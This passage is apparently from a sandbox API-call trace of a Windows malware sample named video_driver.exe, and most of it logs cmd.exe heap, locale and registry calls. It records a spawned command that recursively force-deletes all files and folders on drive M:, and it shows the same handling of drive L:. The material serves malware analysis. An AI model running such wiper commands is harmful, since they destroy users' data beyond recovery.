Flags=0x8, Size=0x400e) returned 0x396ae0 [0067.891] GetProcessHeap () returned 0x380000 [0067.891] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xa0) returned 0x392e50 [0067.891] GetProcessHeap () returned 0x380000 [0067.891] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x396ae0 | out: hHeap=0x380000) returned 1 [0067.891] GetConsoleOutputCP () returned 0x1b5 [0067.892] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.892] GetUserDefaultLCID () returned 0x409 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ff958, cchData=128 | out: lpLCData="0") returned 2 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ff958, cchData=128 | out: lpLCData="0") returned 2 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ff958, cchData=128 | out: lpLCData="1") returned 2 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.894] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.894] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.895] GetProcessHeap () returned 0x380000 [0067.895] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x0, Size=0x20c) returned 0x392ef8 [0067.895] GetConsoleTitleW (in: lpConsoleTitle=0x392ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.896] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.896] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.896] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.896] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.897] GetProcessHeap () returned 0x380000 [0067.897] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x400a) returned 0x396ae0 [0067.897] GetProcessHeap () returned 0x380000 [0067.897] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4008) returned 0x39aaf8 [0067.897] GetProcessHeap () returned 0x380000 [0067.897] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1a) returned 0x3957e0 [0067.897] GetEnvironmentVariableW (in: lpName="p IN (\"L", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.897] _wcsicmp (_String1="p IN (\"L", _String2="CD") returned 13 [0067.897] _wcsicmp (_String1="p IN (\"L", _String2="ERRORLEVEL") returned 11 [0067.897] _wcsicmp (_String1="p IN (\"L", _String2="CMDEXTVERSION") returned 13 [0067.898] _wcsicmp (_String1="p IN (\"L", _String2="CMDCMDLINE") returned 13 [0067.898] _wcsicmp (_String1="p IN (\"L", _String2="DATE") returned 12 [0067.898] _wcsicmp (_String1="p IN (\"L", _String2="TIME") returned -4 [0067.898] _wcsicmp (_String1="p IN (\"L", _String2="RANDOM") returned -2 [0067.898] _wcsicmp (_String1="p IN (\"L", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.898] GetProcessHeap () returned 0x380000 [0067.898] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x3957e0 | out: hHeap=0x380000) returned 1 [0067.898] GetProcessHeap () returned 0x380000 [0067.898] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39aaf8 | out: hHeap=0x380000) returned 1 [0067.898] GetProcessHeap () returned 0x380000 [0067.898] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x4008) returned 0x39aaf8 [0067.898] GetProcessHeap () returned 0x380000 [0067.898] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x39aaf8 | out: hHeap=0x380000) returned 1 [0067.898] GetProcessHeap () returned 0x380000 [0067.898] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x396ae0 | out: hHeap=0x380000) returned 1 [0067.899] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.899] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.899] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.899] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.899] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.899] GetProcessHeap () returned 0x380000 [0067.899] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393110 [0067.899] GetProcessHeap () returned 0x380000 [0067.899] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xe) returned 0x38ffc0 [0067.899] GetProcessHeap () returned 0x380000 [0067.899] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x20) returned 0x3957e0 [0067.900] GetProcessHeap () returned 0x380000 [0067.900] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3957e0, Size=0x16) returned 0x391800 [0067.900] GetProcessHeap () returned 0x380000 [0067.900] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x391800) returned 0x16 [0067.900] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.902] GetProcessHeap () returned 0x380000 [0067.902] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393170 [0067.902] GetProcessHeap () returned 0x380000 [0067.902] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x3931d0 [0067.902] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.902] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.903] GetProcessHeap () returned 0x380000 [0067.903] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x3931f0 [0067.903] GetProcessHeap () returned 0x380000 [0067.903] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x1c) returned 0x3957e0 [0067.903] GetProcessHeap () returned 0x380000 [0067.903] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3957e0, Size=0x14) returned 0x393210 [0067.903] GetProcessHeap () returned 0x380000 [0067.903] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x393210) returned 0x14 [0067.904] _wcsicmp (_String1="del", _String2=")") returned 59 [0067.904] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0067.904] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0067.904] _wcsicmp (_String1="IF", _String2="del") returned 5 [0067.904] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0067.904] _wcsicmp (_String1="REM", _String2="del") returned 14 [0067.904] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0067.904] GetProcessHeap () returned 0x380000 [0067.904] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393230 [0067.904] GetProcessHeap () returned 0x380000 [0067.904] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x10) returned 0x38ffd8 [0067.905] GetProcessHeap () returned 0x380000 [0067.905] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x28) returned 0x393290 [0067.906] GetProcessHeap () returned 0x380000 [0067.906] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x3932c0 [0067.907] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0067.907] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0067.907] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0067.907] GetProcessHeap () returned 0x380000 [0067.907] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393320 [0067.907] GetProcessHeap () returned 0x380000 [0067.907] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x44) returned 0x393380 [0067.907] GetProcessHeap () returned 0x380000 [0067.907] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x3933d0 [0067.908] GetProcessHeap () returned 0x380000 [0067.908] RtlReAllocateHeap (Heap=0x380000, Flags=0x0, Ptr=0x3933d0, Size=0x12) returned 0x3933d0 [0067.908] GetProcessHeap () returned 0x380000 [0067.908] RtlSizeHeap (HeapHandle=0x380000, Flags=0x0, MemoryPointer=0x3933d0) returned 0x12 [0067.908] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0067.908] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0067.908] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0067.908] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0067.908] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0067.908] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0067.909] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0067.909] GetProcessHeap () returned 0x380000 [0067.909] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x12) returned 0x3933f0 [0067.910] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.911] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.911] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.911] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.911] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.911] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.911] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.911] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.911] GetProcessHeap () returned 0x380000 [0067.911] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x58) returned 0x393410 [0067.911] GetProcessHeap () returned 0x380000 [0067.911] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x14) returned 0x393470 [0067.912] GetProcessHeap () returned 0x380000 [0067.912] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x20) returned 0x3957e0 [0067.914] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.918] GetFullPathNameW (in: lpFileName="L:", nBufferLength=0x208, lpBuffer=0x2ff648, lpFilePart=0x2ff3f4 | out: lpBuffer="L:\\", lpFilePart=0x2ff3f4*=0x0) returned 0x3 [0067.918] wcsncmp (_String1="L:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -16 [0067.923] GetFileAttributesW (lpFileName="L:\\" (normalized: "l:")) returned 0xffffffff [0067.923] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.923] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.924] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.924] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.924] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.925] SetConsoleInputExeNameW () returned 0x1 [0067.925] GetConsoleOutputCP () returned 0x1b5 [0067.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.925] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.925] exit (_Code=0) Process: id = "57" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4137c000" os_pid = "0x568" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 85 os_tid = 0x434 [0068.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fc74 | out: lpSystemTimeAsFileTime=0x31fc74*(dwLowDateTime=0x659aae0, dwHighDateTime=0x1d62400)) [0068.020] GetCurrentProcessId () returned 0x568 [0068.020] GetCurrentThreadId () returned 0x434 [0068.020] GetTickCount () returned 0x11486cd [0068.020] QueryPerformanceCounter (in: lpPerformanceCount=0x31fc6c | out: lpPerformanceCount=0x31fc6c*=18815398988) returned 1 [0068.022] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.022] __set_app_type (_Type=0x1) [0068.022] __p__fmode () returned 0x770331f4 [0068.022] __p__commode () returned 0x770331fc [0068.023] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.023] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.023] GetCurrentThreadId () returned 0x434 [0068.023] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x434) returned 0x60 [0068.023] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.024] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.024] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.024] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.024] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x31fc04 | out: phkResult=0x31fc04*=0x0) returned 0x2 [0068.024] VirtualQuery (in: lpAddress=0x31fc3b, lpBuffer=0x31fbd4, dwLength=0x1c | out: lpBuffer=0x31fbd4*(BaseAddress=0x31f000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.024] VirtualQuery (in: lpAddress=0x220000, lpBuffer=0x31fbd4, dwLength=0x1c | out: lpBuffer=0x31fbd4*(BaseAddress=0x220000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.024] VirtualQuery (in: lpAddress=0x221000, lpBuffer=0x31fbd4, dwLength=0x1c | out: lpBuffer=0x31fbd4*(BaseAddress=0x221000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.024] VirtualQuery (in: lpAddress=0x223000, lpBuffer=0x31fbd4, dwLength=0x1c | out: lpBuffer=0x31fbd4*(BaseAddress=0x223000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.024] VirtualQuery (in: lpAddress=0x320000, lpBuffer=0x31fbd4, dwLength=0x1c | out: lpBuffer=0x31fbd4*(BaseAddress=0x320000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0068.024] GetConsoleOutputCP () returned 0x1b5 [0068.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.025] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.025] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.025] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.026] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.026] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.026] GetEnvironmentStringsW () returned 0x5320f8* [0068.026] GetProcessHeap () returned 0x520000 [0068.026] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xaca) returned 0x532bd0 [0068.027] FreeEnvironmentStringsW (penv=0x5320f8) returned 1 [0068.027] GetProcessHeap () returned 0x520000 [0068.027] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x4) returned 0x531898 [0068.027] GetEnvironmentStringsW () returned 0x5320f8* [0068.027] GetProcessHeap () returned 0x520000 [0068.027] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xaca) returned 0x5336a8 [0068.027] FreeEnvironmentStringsW (penv=0x5320f8) returned 1 [0068.027] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31eb74 | out: phkResult=0x31eb74*=0x68) returned 0x0 [0068.027] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x0, lpData=0x31eb80*=0x0, lpcbData=0x31eb78*=0x1000) returned 0x2 [0068.027] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x1, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.027] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x0, lpData=0x31eb80*=0x1, lpcbData=0x31eb78*=0x1000) returned 0x2 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x0, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x40, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x40, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x0, lpData=0x31eb80*=0x40, lpcbData=0x31eb78*=0x1000) returned 0x2 [0068.028] RegCloseKey (hKey=0x68) returned 0x0 [0068.028] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x31eb74 | out: phkResult=0x31eb74*=0x68) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x0, lpData=0x31eb80*=0x40, lpcbData=0x31eb78*=0x1000) returned 0x2 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x1, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x0, lpData=0x31eb80*=0x1, lpcbData=0x31eb78*=0x1000) returned 0x2 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x0, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x9, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x4, lpData=0x31eb80*=0x9, lpcbData=0x31eb78*=0x4) returned 0x0 [0068.028] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x31eb7c, lpData=0x31eb80, lpcbData=0x31eb78*=0x1000 | out: lpType=0x31eb7c*=0x0, lpData=0x31eb80*=0x9, lpcbData=0x31eb78*=0x1000) returned 0x2 [0068.028] RegCloseKey (hKey=0x68) returned 0x0 [0068.028] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0068.028] srand (_Seed=0x5eb34b6d) [0068.028] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q" [0068.028] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q" [0068.029] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.029] GetProcessHeap () returned 0x520000 [0068.029] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x210) returned 0x5320f8 [0068.029] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x532100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0068.029] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0068.029] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0068.029] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.029] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0068.029] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0068.029] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0068.029] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0068.029] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0068.029] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0068.029] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0068.029] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0068.029] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0068.029] GetProcessHeap () returned 0x520000 [0068.030] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x532bd0 | out: hHeap=0x520000) returned 1 [0068.030] GetEnvironmentStringsW () returned 0x532310* [0068.030] GetProcessHeap () returned 0x520000 [0068.030] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0xae2) returned 0x534c70 [0068.030] FreeEnvironmentStringsW (penv=0x532310) returned 1 [0068.030] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0068.030] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0068.030] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0068.030] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0068.030] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0068.030] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0068.030] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0068.030] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0068.030] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0068.030] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0068.030] GetProcessHeap () returned 0x520000 [0068.030] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x54) returned 0x5317c8 [0068.030] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x31f940 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0068.030] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x31f940, lpFilePart=0x31f93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x31f93c*="Desktop") returned 0x25 [0068.030] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0068.031] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x31f6bc | out: lpFindFileData=0x31f6bc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x535760 [0068.031] FindClose (in: hFindFile=0x535760 | out: hFindFile=0x535760) returned 1 [0068.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x31f6bc | out: lpFindFileData=0x31f6bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, 